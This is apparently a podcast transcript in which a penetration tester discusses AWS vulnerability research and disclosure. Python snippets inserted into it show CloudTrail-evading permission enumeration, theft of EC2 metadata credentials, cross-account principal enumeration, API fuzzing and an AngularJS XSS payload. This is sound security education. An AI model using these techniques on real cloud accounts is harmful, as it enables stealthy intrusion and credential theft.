Episode Transcript
Available transcripts are automatically generated. Complete accuracy is not guaranteed.
(00:00):
From my own personal perspective, I always think it’s
(00:02):
best to contact the developers, or the company, or
whoever maintains whatever you found a vulnerability in.
Welcome to Screaming in the Cloud.
I’m Corey Quinn.
I spend a lot of time throwing things at AWS in varying capacities.
One area I don’t spend a lot of time giving them grief is in the
(00:24):
InfoSec world because as it turns out, they—and almost everyone
else—doesn’t have much of a sense of humor around things like security.
My guest today is Nick Frechette, who’s a
penetration tester and team lead for State Farm.
Nick, thanks for joining me.
Hey, thank you for inviting me on.
This episode is sponsored in part by my day job, the Duckbill Group.
(00:47):
Do you have a horrifying AWS bill?
That can mean a lot of things.
Predicting what it's going to be.
Determining what it should be.
Negotiating your next long term contract with AWS.
Or just figuring out why it increasingly resembles a
phone number, but nobody seems to quite know why that is.
To learn more, visit duckbillgroup.com.
(01:08):
Remember, you can't duck the Duckbill, Bill.
And my CEO informs me that is absolutely not our slogan.
So, like most folks in InfoSec, you tend to have a bunch of different,
I guess, titles or roles that hang on signs around someone’s neck.
And it all sort of distills down, on some level—in your
case, at least, and please correct me if I’m wrong—to
‘cloud security researcher.’ Is that roughly correct?
(01:31):
Or am I missing something fundamental?
Yeah.
So, for my day job, I do penetration testing, and that kind of
puts me up against a variety of things, from web applications,
to client-side applications, to sometimes the cloud.
In my free time, though, I like to spend a lot of time on security
research, and most recently been focusing pretty heavily on AWS.
(01:52):
So, let’s start at the very beginning.
What is a cloud security researcher?
“What is it you’d say it is you do here?” For lack of a better phrasing?
Well, to be honest, the phrase ‘security researcher’ or ‘cloud security
researcher’ has been, kind of… I guess watered down in recent years;
everybody likes to call themselves a researcher in some way or another.
(02:13):
You have some folks who participate in the bug bounty programs.
So, for example, GCP, and Azure have their own bug bounties.
AWS does not, and I’m not too sure why.
And so they want to find vulnerabilities with the
intention of getting cash compensation for it.
You have other folks who are interested in doing security research to try and
better improve defenses and alerting and monitoring so that when the next major
(02:38):
breach happens, they’re prepared or they’ll be able to stop it ahead of time.
From what I do, I’m very interested in offensive security research.
So, how can I, as a penetration tester, or red teamer, or, I guess,
an actual criminal, [laugh] how can I take advantage of AWS, or
try to avoid detection from services like GuardDuty and CloudTrail?
(02:59):
So, let’s break that down a little bit further.
I’ve heard the term of ‘red team versus blue team’ used before.
Red team—presumably—is the offensive security folks—and yes, some of those
people are, in fact, quite offensive—and blue team is the defense side.
In other words, keeping folks out.
Is that a reasonable summation of the state of the world?
It can be, yeah, especially when it comes to security.
(03:20):
One of the nice parts about the whole InfoSec field—I know a lot of folks tend
to kind of just say, “Oh, they’re there to prevent the next breach,” but in
reality, InfoSec has a ton of different niches and different job specialties.
“Blue teamers,” quote-unquote, tend to be the defense side working on
ensuring that we can alert and monitor potential attacks, whereas red
(03:41):
teamers—or penetration testers—tend to be the folks who are trying to do
the actual exploitation or develop techniques to do that in the future.
So, you talk a bit about what you do for work, obviously,
but what really drew my notice was stuff you do that
isn’t part of your core job, as best I understand it.
You’re focused on vulnerability research, specifically with a strong
(04:03):
emphasis on cloud exploitation, as you said—AWS in particular—and you’re
the founder of Hacking the Cloud, which is an open-source encyclopedia
of various attacks and techniques you can perform in cloud environments.
Tell me about that.
Yeah, so Hacking the Cloud came out of a frustration I had when I was
first getting into AWS, that there didn’t seem to be a ton of good
(04:28):
resources for offensive security professionals to get engaged in the cloud.
By comparison, if you wanted to learn about web application
hacking, or attacking Active Directory, or reverse engineering,
if you have a credit card, I can point you in the right direction.
But there just didn’t seem to be a good course or introduction
(04:49):
to how you, as a penetration tester, should attack AWS.
There’s things like, you know, open S3 buckets are a nightmare,
or that server-side request forgery on an EC2 instance can
result in your organization being fined very, very heavily.
I kind of wanted to go deeper with that.
And with Hacking the Cloud, I’ve tried to gather a bunch of
(05:10):
offensive security research from various blog posts and conference
talks into a single location, so that both the offense side and
the defense side can kind of learn from it and leverage that to
either improve defenses or look for things that they can attack.
It seems to me that doing things like that is not likely to wind up
making a whole heck of a lot of friends over on the cloud provider side.
(05:33):
Can you talk a little bit about how what you do
is perceived by the companies you’re focusing on?
Yeah.
So, in terms of relationship, I don’t really
have too much of an idea of what they think.
I have done some research and written on my blog, as well
as published to Hacking the Cloud, some techniques for doing
things like abusing the SSM agent, as well as abusing the AWS
(05:58):
API to enumerate permissions without logging to CloudTrail.
And ironically, through the power of IP addresses, I can see
when folks from the Amazon corporate IP address space look at
my blog, and that’s always fun, especially when there’s, like,
four in the course of a couple of minutes, or five or six.
But I don’t really know too much about what they—or how
they view it, or if they think it’s valuable at all.
(06:20):
I hope they do, but really not too sure.
I would imagine that they do, on some level, but I guess the big question
is, you know that someone doesn’t like what you’re doing when they send,
you know, cease and desist notices, or have the police knock on your door.
I feel like at most levels, we’re past that in an
InfoSec level, at least I’d like to believe we are.
We don’t hear about that happening all too often anymore.
(06:42):
But what’s your take on it?
Yeah, I definitely agree.
I definitely think we are beyond that.
Most companies these days know that vulnerabilities are going
to happen, no matter how hard you try and how much money you
spend, and so it’s better to be accepting of that and open to it.
And especially because the InfoSec community can be so, say,
noisy at times, it’s definitely worth it to pay attention,
(07:05):
definitely be appreciative of the information that may come out.
AWS is pretty awesome to work with, having
disclosed to them a couple times, now.
They have a safe harbor provision, which essentially says that so long as
you’re operating in good faith, you are allowed to do security testing.
They do have some rules around that, but they are pretty clear that if
(07:26):
you were operating in good faith, you wouldn’t be doing anything like that.
It tends to be pretty obviously malicious things that they’ll ask you to stop.
So, talk to me a little bit about what
you’ve found lately, and been public about.
There have been a number of examples that have come up whenever
people start googling your name or looking at things you’ve done.
But what’s happening lately?
(07:46):
What have you found that’s
interesting?
Yeah.
So, I think most recently, the thing that’s kind of gotten the most
attention has been a really interesting bug I found in the AWS API.
Essentially, kind of the core of it is that when you are interacting with the
API, obviously that gets logged to CloudTrail, so long as the action is one CloudTrail supports.
So, if you are successful, say you want to do, like,
(08:09):
Secrets Manager, ListSecrets, that shows up in CloudTrail.
And similarly, if you do not have that permission on a role or user and
you try to do it, that access denied also gets logged to CloudTrail.
Something kind of interesting that I found is that by manually
modifying a request, or malforming it, we can change the
content-type header—and you can provide literally gibberish.
(08:31):
I think I have a VS Code window here somewhere with a content-type of
‘meow’—when you do that, the AWS API knows the action that you’re trying to
call, but because of that messed-up content type, it doesn’t know exactly what
you’re trying to do, and as a result, it doesn’t get logged to CloudTrail.
Now, while that may seem kind of weirdly specific and not
(08:52):
really, like, a concern, the nice part of it, though, is that
for some API actions—somewhere in the neighborhood of 600;
I say ‘in the neighborhood of’ just because it fluctuates over
time—you can tell if you have that permission, or if you
don’t, without that being logged to CloudTrail.
And so we can do this enumeration of permissions
(09:14):
without somebody in the defense side seeing us do it.
Which is pretty awesome from an offensive security perspective.
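For the curious, the probe looks roughly like this—a minimal sketch using botocore’s low-level signer, not Nick’s actual tooling. The target action and the ‘meow’ content type are illustrative, and since this undocumented behavior was reported to AWS, it may no longer work as described:

```python
# Rough sketch of the malformed content-type probe described above.
# Service, action, and the gibberish header value are illustrative.
import requests
from botocore.auth import SigV4Auth
from botocore.awsrequest import AWSRequest
from botocore.session import Session

region = "us-east-1"
creds = Session().get_credentials()

# Secrets Manager normally expects Content-Type:
# application/x-amz-json-1.1; a gibberish value was what kept the call
# out of CloudTrail while still returning allow/deny information.
request = AWSRequest(
    method="POST",
    url=f"https://secretsmanager.{region}.amazonaws.com/",
    data=b"{}",
    headers={
        "X-Amz-Target": "secretsmanager.ListSecrets",
        "Content-Type": "meow",
    },
)
SigV4Auth(creds, "secretsmanager", region).add_auth(request)
prepared = request.prepare()

resp = requests.post(prepared.url, data=prepared.body, headers=dict(prepared.headers))
# An AccessDenied-style error vs. anything else reveals whether the
# caller holds secretsmanager:ListSecrets -- without a CloudTrail entry.
print(resp.status_code, resp.text[:200])
```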
On some level, it would be easy to say, “Well, just not showing up
in the logs isn’t really a security problem at all.” I guess that you
disagree?
I do, yeah.
So, let’s sort of look at it from a real-world perspective.
Let’s say, Corey, you’re tired of saving people money on their AWS
(09:37):
bill, you’d instead maybe want to make a little money on the side and
you’re okay with perhaps, you know, committing some crimes to do it.
Through some means you get access to a company’s AWS credentials for
some particular role, whether that’s through remote code execution
on an EC2 instance, or maybe you find them in an open location like
an S3 bucket or a Git repository, or maybe you phish a developer.
(10:01):
However it happens, you have an access key and a secret access key.
The new problem that you have is that you don’t know what those
credentials are associated with, or what permissions they have.
They could be the root account keys, or they could be
literally locked down to a single S3 bucket to read from.
It all just kind of depends.
Now, historically, your options for figuring that out are kind of limited.
(10:25):
Your best bet would be to brute-force the AWS API using a tool like
Pacu, or my personal favorite, which is enumerate-iam by Andres Riancho.
And what that does is it just tries a bunch of API
calls and sees which one works and which one doesn’t.
And if it works, you clearly know that you have that permission.
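As a rough illustration of that brute-force approach (this is not the enumerate-iam code itself, and the probe list is just a small sample; real tools try far more calls):

```python
# Minimal sketch of the classic noisy approach: try read-only calls with
# the captured keys and sort them into allowed/denied.
import boto3
from botocore.exceptions import ClientError

session = boto3.Session(
    aws_access_key_id="AKIA...",   # the found access key (placeholder)
    aws_secret_access_key="...",   # the found secret key (placeholder)
)

probes = [
    ("s3", "list_buckets"),
    ("iam", "list_users"),
    ("ec2", "describe_instances"),
    ("secretsmanager", "list_secrets"),
]

for service, operation in probes:
    client = session.client(service, region_name="us-east-1")
    try:
        getattr(client, operation)()
        print(f"ALLOWED: {service}:{operation}")
    except ClientError as err:
        # Every one of these denials is an event a defender can alert on.
        print(f"denied:  {service}:{operation} ({err.response['Error']['Code']})")
```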
Now, the problem with that, though, is that if you were to do
(10:46):
that, that’s going to light up CloudTrail like a Christmas tree.
It’s going to start showing all these access denieds
for these various API calls that you’ve tried.
And obviously, any defender who’s paying
attention is going to look at that and go, “Okay.
That’s, uh, that’s suspicious,” and you’re
going to get shut down pretty quickly.
What’s nice about this bug that I found is that instead of having to litter
CloudTrail with all these logs, we can just do this enumeration for roughly
(11:10):
600-ish API actions across roughly 40 AWS services, and nobody is the wiser.
You can enumerate those permissions, and if they work fantastic, and
you can then use them, and if you come to find you don’t have any
of those 600 permissions, okay, then you can decide on where to go
from there, or maybe try to risk things showing up in CloudTrail.
(11:30):
CloudTrail is one of those services that I find
incredibly useful, or at least I do in theory.
In practice, it seems that things don’t show up there, and you don’t
realize that those types of activities are not being recorded until
one day there’s an announcement of, “Hey, that type of activity
is now recorded.” As of the time of this recording, the most
recent example that comes to mind is data plane requests to DynamoDB.
(11:51):
It’s, “Wait a minute.
You mean that wasn’t being recorded previously?
Huh.
I guess it makes sense, but oh, dear.”
And that causes a reevaluation of what’s happening from
a security policy and posture perspective for some clients.
There’s also, of course, the challenge of CloudTrail
logs take a significant amount of time to show up.
It used to be over 20 minutes, I believe now it’s
(12:12):
closer to 15—but don’t quote me on that, obviously.
Run your own tests—which seems awfully slow for anything that’s
going to be looking at those in an automated fashion and taking
a reactive or remediation approach to things that show up there.
Am I missing something key?
No, I think that is pretty spot on.
And believe me, [laugh] I am fully aware of how long
CloudTrail takes to populate, especially having done a bunch
(12:35):
of research on what is and what is not logged to CloudTrail.
I know that there are some operations that can be
logged more quickly than the 15-minute average.
Off the top of my head, though, I actually don’t quite remember what those are.
But you’re right, in general, the majority at least do take quite a while.
And that’s definitely time in which an adversary or someone like me,
(12:55):
could maybe take advantage of that 15-minute window to try and brute
force those permissions, see what we have access to, and then try
to operate and get out with whatever goodies we’ve managed to steal.
Let’s say that you’re doing the thing that you do, however
that comes to be—and I am curious—actually, we’ll start there.
I am curious; how do you discover these things?
Is it looking at what is presented and then figuring out,
(13:19):
“Huh, how can I wind up subverting the system it’s based on?”
Similar to the way that I take a look at any random AWS
service and try to figure out how to use it as a database?
How do you find these things?
Yeah, so to be honest, it all kind of depends.
Sometimes it’s completely by accident.
So, for example, the API bug I described about not logging to
CloudTrail, I actually found that due to [laugh] copy and pasting
(13:41):
code from AWS’s website, and I didn’t change the content-type header.
And as a result, I happened to notice this weird
behavior, and kind of took advantage of it.
Other times, it’s thinking a little bit about how something
is implemented and the security ramifications of it.
So, for example, the SSM agent—which is a phenomenal tool in order
to do remote access on your EC2 instances—I was sitting there one day
(14:05):
and just kind of thought, “Hey, how does that authenticate exactly?
And what can I do with it?” Sure enough, it authenticates the exact same way
that the AWS API does, that being the metadata service on the EC2 instance.
And so what I figured out pretty quickly is if you can get access
to an EC2 instance, even as a low-privilege user or you can do
(14:26):
server-side request forgery to get the keys, or if you just have
sufficient permissions within the account, you can potentially intercept
SSM messages from, like, a session and provide your own results.
And so in effect, if you’ve compromised an EC2 instance, and the only
way, say, incident response has into that box is SSM, you can effectively
(14:47):
lock them out of it and, kind of, do whatever you want in the meantime.
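To make that authentication path concrete, here is a minimal sketch of pulling the instance role’s credentials from the EC2 metadata service (IMDSv2 shown), which is the same material the SSM agent authenticates with. This illustrates the credential source only, not the message interception itself:

```python
# Minimal sketch: fetch instance role credentials from the EC2 metadata
# service (IMDSv2). Run on an instance; this is the same credential
# source the SSM agent uses, per the discussion above.
import requests

IMDS = "http://169.254.169.254/latest"

# IMDSv2 requires a session token before any metadata reads.
token = requests.put(
    f"{IMDS}/api/token",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
).text
headers = {"X-aws-ec2-metadata-token": token}

role = requests.get(
    f"{IMDS}/meta-data/iam/security-credentials/", headers=headers
).text.strip()
creds = requests.get(
    f"{IMDS}/meta-data/iam/security-credentials/{role}", headers=headers
).json()

# AccessKeyId, SecretAccessKey, and Token here are exactly what a
# low-privilege local user or an SSRF can walk away with.
print(creds["AccessKeyId"], creds["Expiration"])
```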
That seems like it’s something of a problem.
It definitely can be.
But it is a lot of fun to play keep-away with incident response.
[laugh].
I’d like to reiterate that this is all in environments
you control and have permissions to be operating within.
It is not recommended that people pursue things like this
(15:07):
in other people’s cloud environments without permissions.
I don’t want to find us sued for giving crap advice, and I
don’t want to find listeners getting arrested because they
didn’t understand the nuances of what we’re talking about.
Yes, absolutely.
Getting legal approval is really important for
any kind of penetration testing or red teaming.
I know some folks sometimes might get carried away, but definitely
(15:28):
be sure to get approval before you do any kind of testing.
So, how does someone report a vulnerability to a company like AWS?
So AWS, at least publicly, doesn’t have any kind of bug bounty program.
But what they do have is a vulnerability disclosure program.
And that is essentially an email address that you can
contact and send information to, and that’ll act as your
(15:50):
point of contact with AWS while they investigate the issue.
And at the end of their investigation, they can report back with
their findings, whether they agree with you and they are working to
get that patched or fixed immediately, or if they disagree with you
and think that everything is hunky-dory, or if you may be mistaken.
I saw a tweet the other day that I would love to get your thoughts
(16:10):
on, which said effectively, that if you don’t have a public
bug bounty program, then any way that a researcher chooses to
disclose the vulnerability is definitionally responsible on their
part because they don’t owe you any particular duty of care.
Responsible disclosure, of course, is also referred to
(16:31):
as, “Coordinated vulnerability disclosure” because we’re
always trying to reinvent terminology in this space.
What do you think about that?
Is there a duty of care from security researchers to responsibly disclose
the vulnerabilities they find, or coordinate those vulnerabilities with
vendors in the absence of a public bounty program on turning those things in?
(16:51):
Yeah, you know, I think that’s a really difficult question to answer.
From my own personal perspective, I always think it’s best to contact
the developers, or the company, or whoever maintains whatever you found
a vulnerability in, give them the best shot to have it fixed or repaired.
Obviously, sometimes that works great, and the company is
super receptive, and they’re willing to patch it immediately.
(17:13):
And other times, they just don’t respond, or sometimes they respond
harshly, and so depending on the situation, it may be better for you to
release it publicly with the intention that you’re informing folks that
this particular company or this particular project may have an issue.
On the flip side, I can kind of understand—although I don’t necessarily
(17:34):
condone it—why folks pursue things like exploit brokers, for example.
So, if a company doesn’t have a bug bounty program, and the
researcher isn’t expecting any kind of, like, cash compensation, I
can understand why they may spend tens of hours, maybe hundreds of
hours chasing down a particularly impactful vulnerability, only to
(17:54):
maybe write a blog post about it or get a little head pat and say,
“Thanks, nice work.” And so I can see why they may pursue things like
selling to an exploit broker who may pay them hefty sum, if it is a—
Orders of magnitude more.
It’s, “Oh, good.
You found a way to remotely execute code across all of EC2 in every
region”—that is a hypothetical; don’t email me—have a t-shirt.
(18:16):
It seems like you could basically buy all the t-shirts
for [laugh] what that is worth on the export market.
Yes, absolutely.
And I do know from some experience that folks will reach out to
you and are interested in, particularly, some cloud exploits.
Nothing, like, minor, like some of the things that I’ve found, but more
thinking more of, like, accessing resources without anybody knowing or
(18:37):
accessing resources cross-account; that could go for quite a hefty sum.
Here at the Duckbill Group, one of the things we do with,
you know, my day job, is we help negotiate AWS contracts.
We just recently crossed five billion dollars of contract value negotiated.
It solves for fun problems such as how do you know that your
(18:58):
contract that you have with AWS is the best deal you can get?
How do you know you're not leaving money on the table?
How do you know that you're not doing what I do on this podcast
and on Twitter constantly and sticking your foot in your mouth?
To learn more, come chat at duckbillgroup.com.
Optionally, I will also do podcast voice when we talk about it.
(19:21):
Again, that's duckbillgroup.com.
It always feels squicky, on some level, to discover something like this that’s
kind of neat, and wind up selling it to basically some arguably terrible people.
Maybe.
We don’t know who’s buying these things from the exploit broker.
Counterpoint, having reported a few security problems myself to various
providers, you get an autoresponder, then you get a thank you email that goes
(19:46):
into a bit more detail—for the well-run programs, at least—and invariably, the
company’s position is that whatever you found is not as big of a deal as you
think it is, and therefore they see no reason to publish it or go loud with it.
Wouldn’t you agree?
Because, on some level, their entire position is, please don’t talk about
any security shortcomings that you may have discovered in our system.
(20:08):
And I get why they don’t want that going loud, but by the same token,
security researchers need a reputation to continue operating on some level
in the market as security researchers, especially independents, especially
people who are trying to make names for themselves in the first place.
Yeah.
How do you resolve that dichotomy yourself?
Yeah, so, from my perspective, I totally understand why a company
(20:32):
or project wouldn’t want you to publicly disclose an issue.
Everybody wants to look good, and nobody wants to be called out for
any kind of issue that may have been unintentionally introduced.
I think the thing at the end of the day, though, from my perspective, if I,
as some random guy in the middle of nowhere Illinois finds a bug, or to be
frank, if anybody out there finds a vulnerability in something, then a much
(20:54):
more sophisticated adversary is equally capable of finding such a thing.
And so it’s better to have these things out in the open and discussed,
rather than hidden away, so that we have the best chance of anybody being
able to defend against it or develop detections for it, rather than just
kind of being like, “Okay, the vendor didn’t like what I had to say,
(21:15):
I guess I’ll go back to doing whatever [laugh] things I normally do.”
You’ve obviously been doing this for a while.
And I’m going to guess that your entire
security researcher career has not been focused
on cloud environments in general and AWS in particular.
Yes, I’ve done some other stuff in relation to abusing GitLab Runners.
I also happened to find a pretty neat RCE and privilege
(21:36):
escalation in the very popular open-source project, Pi-hole.
Not sure if you have any experience with that.
Oh, I run it myself all the time for various DNS
blocking purposes and other sundry bits of nonsense.
Oh, yes, good.
But what I’m trying to establish here is that this is
not just one or two companies that you’ve worked with.
You’ve done this across the board, which means I can ask a
question without naming and shaming anyone, even implicitly.
(21:58):
What differentiates good vulnerability disclosure programs from terrible ones?
Yeah, I think the major differentiator is the reactivity
of the project, as in how quickly they respond to you.
There are some programs I’ve worked with where you disclose something,
maybe even that might be of a high severity, and you might not hear back
(22:18):
for four weeks at a time, whereas there are other programs, particularly the
MSRC—which is a part of Microsoft—or with AWS’s disclosure program, where
within the hour, I had a receipt of, “Hey, we received this, we’re looking
into it.” And then within a couple hours after that, “Yep, we verified it.
We see what you’re seeing, and we’re going to look at it right away.” I
think that’s definitely one of the major differentiators for programs.
(22:42):
Are there any companies you’d like to call out in either
direction—and, “No,” is a perfectly valid [laugh] answer to this
one—for having excellent disclosure programs versus terrible ones?
I don’t know if I’d like to call anybody out negatively.
But in support, I have definitely appreciated working with both AWS’s and
the MSRC—Microsoft’s—I think both of them have done a pretty fantastic job.
(23:03):
And they definitely know what they’re doing at this point.
Yeah, I must say that I primarily focus on AWS and have for a
while, which should be blindingly obvious to anyone who’s listened
to me talk about computers for more than three and a half minutes.
But my experiences with the security folks at AWS have been uniformly
positive, even when I find things that they don’t want me talking
about, that I will be talking about regardless, they’ve always
(23:26):
been extremely respectful, and I have never walked away from the
conversation thinking that I was somehow cheated by the experience.
In fact, a couple of years ago at the last in-person re:Invent, I
got to give a talk around something I reported specifically about
how AWS runs its vulnerability disclosure program with one of their
security engineers, Zach Glick, and he was phenomenally transparent
(23:50):
around how a lot of these things work, and what they care about,
and how they view these things, and what their incentives are.
And obviously being empathetic to people reporting things in with
the understanding that there is no duty of care that when security
researchers discover something, they then must immediately go
and report it in return for a pat on the head and a thank you.
It was really neat being able to see both
(24:12):
sides simultaneously around a particular issue.
I’d recommend it to other folks, except I don’t
know how you make that lightning strike twice.
It’s very, very wise.
Yes.
Thank you.
I do my best.
So, what’s next for you?
You’ve obviously found a number of interesting
vulnerabilities around information disclosure.
One of the more recent things that I found that was sort of neat as I trolled
(24:32):
the internet—I don’t believe it was yours, but there was an ability to determine
the account ID that owned an S3 bucket by enumerating by a binary search.
Did you catch that at all?
I did.
That was by Ben Bridts, which is a pretty awesome technique, and
that’s been something I’ve been kind of interested in for a while.
There is an ability to enumerate users, roles, and service-linked
(24:55):
roles inside an account, so long as you have the account ID.
The problem, of course, is getting the account ID.
So, when Ben put that out there I was super stoked about being able to
leverage that now for enumeration and maybe some fun phishing tricks with that.
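One widely documented way that kind of principal enumeration can work (a hedged sketch, not necessarily Nick’s exact method): IAM validates the principals named in a trust policy, so updating a throwaway role in your own account with a candidate ARN fails only when that principal doesn’t exist. Role and account values below are placeholders:

```python
# Hedged sketch of cross-account principal enumeration via trust-policy
# validation: IAM rejects a policy naming a nonexistent principal with a
# MalformedPolicyDocument error. Requires a scratch role in YOUR account.
import json
import boto3
from botocore.exceptions import ClientError

iam = boto3.client("iam")
TARGET_ACCOUNT = "123456789012"  # the discovered account ID (placeholder)
SCRATCH_ROLE = "enum-scratch"    # a role you control (placeholder)

def principal_exists(role_name: str) -> bool:
    policy = {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Deny",  # Deny, so the scratch role grants nothing
            "Principal": {"AWS": f"arn:aws:iam::{TARGET_ACCOUNT}:role/{role_name}"},
            "Action": "sts:AssumeRole",
        }],
    }
    try:
        iam.update_assume_role_policy(
            RoleName=SCRATCH_ROLE, PolicyDocument=json.dumps(policy)
        )
        return True
    except ClientError as err:
        if err.response["Error"]["Code"] == "MalformedPolicyDocument":
            return False
        raise

for candidate in ["admin", "deploy", "OrganizationAccountAccessRole"]:
    print(candidate, principal_exists(candidate))
```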
I love the idea.
I love seeing that sort of thing being conducted.
And AWS’s official policy as best I remember when I looked
(25:17):
at this once, account IDs are not considered confidential.
Do you agree with that?
Yep.
That is my understanding of how AWS views it.
From my perspective, having an account ID can be beneficial.
I mentioned that you can enumerate users, roles, and service-linked
roles with it, and that can be super useful from a phishing perspective.
(25:38):
The average phishing email looks like, “Oh, you won an iPad,” or, “Oh,
you’re the 100th visitor of some website,” or something like that.
But imagine getting an email that looks like it’s from something like AWS
developer support, or from some research program that they’re doing, and
they can say to you, like, “Hey, we see that you have these roles in your
(25:59):
account with account ID such-and-such, and we know that you’re using EKS,
and you’re using ECS,” that phishing email becomes a lot more believable
when suddenly this outside party seemingly knows so much about your account.
And that might be something that you would think, “Oh, well only a
real AWS employee or AWS would know that.” So, from my perspective,
I think it’s best to try and keep your account ID secret.
(26:23):
I actually redact it from every screenshot
that I publish, or at the very least, I try to.
At the same time, though, it’s not the kind of thing that’s
going to get somebody in your account in a single step, so I
can totally see why some folks aren’t too concerned about it.
I feel like we also got a bit of a red herring coming from AWS
blog posts themselves, where they always will give screenshots
(26:44):
explaining what they do, and redact the account ID in every case.
And the reason that I was told at one point was, “Oh, we
have an internal provisioning system that’s different.
It looks different, and I don’t want to confuse people whenever I
wind up doing a screenshot.” And that’s great, and I appreciate that.
And part of me wonders on one level how accurate is that?
(27:05):
Because sure, I understand that you don’t necessarily want to
distract people with something that looks different, but then I
found out that the system is called Isengard and, yeah, it’s great.
They’ve mentioned it periodically in blog posts, and talks, and the rest.
And part of me now wonders, oh, wait a minute.
Is it actually because they don’t want to disclose the differences
between those systems, or is it because they don’t have license
(27:25):
rights publicly to use the word Isengard and don’t want to get
sued by whoever owns the rights to the Lord of the Rings trilogy.
So, one wonders what the real incentives are in different cases.
But I’ve always viewed account IDs as being the sort of
thing that eh, you probably don’t want to share them around
all the time, but it also doesn’t necessarily hurt.
Exactly, yeah.
It’s not the kind of thing you want to share with the
(27:46):
world immediately, but it doesn’t really hurt in the end.
There was an early time when the partner network was effectively determining
tiers of partner by how much spend they influenced, and the way that you
demonstrated that was by giving account IDs for your client accounts.
The only verification at the time, to my understanding was that,
“Yep, that mapped to the client you said it did.” And that was it.
(28:08):
So, I can understand back in those days not wanting to muddy those waters.
But those days are also long passed.
So, I get it.
I’m not going to be the first person to advertise mine, but if you can discover
my account ID by looking at a bucket, it doesn’t really keep me up at night.
So, all of those things considered, we’ve had a pretty
wide-ranging conversation here about a variety of things.
(28:29):
What’s next?
What interests you as far as where you’re going to start looking and
exploring—and exploiting as the case may be—various cloud services?
hackthe.cloud—there is a dot in there, which also turns it into a
domain; excellent choice—is absolutely going to be a great collection for a lot
(28:49):
of what you find and for other people to contribute and learn from one another.
But where are you aimed at?
What’s next?
Yeah, so one thing I’ve been really interested in has been fuzzing the AWS API.
As anyone who’s ever used AWS before knows, there are hundreds
of services with thousands of potential API endpoints.
And so from a fuzzing perspective, there is a wide variety of things
(29:11):
for us to potentially affect or potentially find vulnerabilities in.
I’m currently working on a library that will
allow me to make that fuzzing a lot easier.
You could use things like botocore, Boto3, like, some of the AWS SDKs.
The problem though, is that those are designed for, sort of like, the
happy path where you can format your request the way Amazon wants.
(29:33):
As a security researcher or as someone doing fuzzing, I kind of want
to send random gibberish sometimes, or I want to malform my requests.
And so that library is still in development,
but it has already resulted in a bug.
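To give a flavor of what such a library enables (a toy sketch under stated assumptions—this is not Nick’s unreleased library, and the target service and mutation strategy here are arbitrary), botocore’s low-level primitives will happily sign a body the high-level SDKs would never emit:

```python
# Toy sketch of raw-request fuzzing: build and sign a request with
# botocore's low-level pieces, with a malformed body the SDKs' happy
# path would reject. Target and mutation strategy are illustrative.
import os
import requests
from botocore.auth import SigV4Auth
from botocore.awsrequest import AWSRequest
from botocore.session import Session

region = "us-east-1"
creds = Session().get_credentials()

# Random gibberish in place of the well-formed payload the SDKs enforce.
body = os.urandom(32)

request = AWSRequest(
    method="POST",
    url=f"https://elasticbeanstalk.{region}.amazonaws.com/",
    data=body,
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)
# Sign after mutating, so the signature matches the malformed body.
SigV4Auth(creds, "elasticbeanstalk", region).add_auth(request)
prepared = request.prepare()

resp = requests.post(prepared.url, data=prepared.body, headers=dict(prepared.headers))
# Unexpected 5xx responses or odd error strings are the interesting part.
print(resp.status_code, resp.text[:200])
```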
While I was fuzzing part of the AWS API, I happened to notice that
I broke Elastic Beanstalk—quite literally—when [laugh] when I was
going through the AWS console, I got the big red error message of,
(29:56):
“[unintelligible] that request parameter is null.” And I was like, “Huh.
Well, why is it null?”
And come to find out as a result of that, there is an HTML injection
vulnerability in the Elastic—well, there was an HTML injection
vulnerability in Elastic Beanstalk, in the AWS console.
Pivoting from there, Elastic Beanstalk uses
Angular 1.8.1, or at least it did when I found it.
(30:17):
As a result of that, we can modify that HTML injection to do template injection.
And for the AngularJS crowd, template injection is basically cross-site
scripting [laugh] because there is no sandbox anymore, at least in that version.
And so as a result of that, I was able to get cross-site
scripting in the AWS console, which is pretty exciting.
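For the AngularJS-curious, the general shape of a post-sandbox template injection looks like this—the generic textbook payload, not the specific one used against the Beanstalk console:

```python
# Classic shape of an AngularJS (1.6+) client-side template injection:
# with the expression sandbox removed, an interpolated expression can
# reach the Function constructor and run arbitrary JavaScript. This is
# the well-known generic payload, not the one used against Beanstalk.
payload = "{{constructor.constructor('alert(document.domain)')()}}"

# If HTML injection lets this string land inside markup that Angular
# compiles (e.g. within an ng-app scope), the expression executes:
# cross-site scripting in whatever origin rendered it.
print(payload)
```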
That doesn’t tend to happen too frequently.
(30:38):
No, that is not a typical issue that winds up getting disclosed very often.
Definitely, yeah.
And so I was excited about it, and considering the fact that my library
for fuzzing is literally, like, barely halfway done, I’m looking
forward to what other things I can find with it.
I look forward to reading more.
And at the time of this recording, I should point out
(30:59):
that this has not been finalized or made public, so I’ll
be keeping my eyes open to see what happens with this.
And hopefully, this will be old news by the time this episode drops.
If not, well, [laugh] this might be an interesting episode once it goes out.
Yeah.
I hope they’ll have it fixed by then.
They haven’t responded to it yet other than the, “Hi, we’ve received your email.
(31:21):
Thanks for checking in.” But we’ll see how that goes.
Watching news as it breaks is always exciting.
If people want to learn more about what you’re up to,
and how you go about things, where can they find you?
Yeah, so you can find me at a couple different places.
On Twitter I’m @frichette_n.
I also write a blog where I contribute a lot of my
research at frechetten.com as well as Hacking the Cloud.
(31:43):
I contribute a lot of the AWS stuff that gets thrown on there.
And it’s also open-source, so if anyone else would like to contribute
or share their knowledge, you’re absolutely welcome to do so.
Pull requests are open, and I’m excited for anyone to contribute.
Excellent.
And we will of course include links to that in the [show
notes]. Thank you so much for taking the time to speak with me.
I really appreciate it.
Yeah, thank you so much for inviting me on.
(32:04):
I had a great time.
Nick Frechette, penetration tester and team lead for State Farm.
I’m Cloud Economist Corey Quinn, and this is Screaming in the Cloud.
If you’ve enjoyed this podcast, please leave a five-star review on
your podcast platform of choice, whereas if you’ve hated this podcast,
please leave a five-star review on your podcast platform of choice,
along with a comment telling me why none of these things are actually
(32:25):
vulnerabilities, but simultaneously should not be discussed in public, ever.